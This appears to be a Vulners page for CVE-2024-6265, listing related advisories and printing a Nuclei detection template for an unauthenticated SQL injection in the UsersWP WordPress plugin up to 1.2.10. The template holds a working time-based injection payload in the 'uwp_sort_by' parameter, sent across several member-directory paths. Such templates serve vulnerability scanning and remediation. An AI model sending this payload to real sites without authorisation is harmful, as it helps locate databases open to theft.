| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-6265 | 6 Feb 202614:59 | – | circl | |
| WordPress plugin UsersWP security vulnerability | 29 Jun 202400:00 | – | cnnvd | |
| CVE-2024-6265 | 29 Jun 202404:33 | – | cve | |
| CVE-2024-6265 UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress <= 1.2.10 - Unauthenticated SQL Injection via 'uwp_sort_by' | 29 Jun 202404:33 | – | cvelist | |
| EUVD-2024-47385 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-6265 | 29 Jun 202405:15 | – | nvd | |
| CVE-2024-6265 | 29 Jun 202405:15 | – | osv | |
| WordPress UsersWP Plugin <= 1.2.10 is vulnerable to SQL Injection | 1 Jul 202400:00 | – | patchstack | |
| WordPress UsersWP plugin <= 1.2.10 - Unauthenticated SQL Injection via 'uwp_sort_by' vulnerability | 1 Jul 202403:48 | – | patchstack | |
| PT-2024-37495 · WordPress · Userswp | 29 Jun 202400:00 | – | ptsecurity |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-6265 |
id: CVE-2024-6265
info:
name: UsersWP <= 1.2.10 - Unauthenticated SQL Injection
author: Shivam Kamboj
severity: critical
description: |
UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress contains a time-based SQL Injection caused by insufficient escaping of the 'uwp_sort_by' parameter in all versions up to 1.2.10, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires attacker to control the 'uwp_sort_by' parameter.
remediation: |
Update to version 1.2.11 or later.
impact: |
Attackers can extract sensitive database information by executing arbitrary SQL queries, leading to data breach.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-6265
metadata:
verified: true
max-request: 6
publicwww-query: "/plugins/userswp/"
tags: cve,cve2024,wordpress,wp,wp-plugin,userswp,sqli,time-based,unauth,vkev
http:
- raw:
- |
@timeout: 10s
GET {{path}}?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- "/users/"
- "/members/"
- "/user-list/"
- "/member-directory/"
- "/directory/"
- "/all-users/"
attack: clusterbomb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains_any(body, "uwp-users", "uwp_page", "wp-content/plugins/userswp")'
condition: and
# digest: 4b0a0048304602210083b370da7d6774d11afc34aa8a76c9b47a52c51034fa22a0988641c08c4bb152022100d6c7b85923170542d0072ca61d4506ff0c963b1f3a15c1adb881bb8aee19799f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation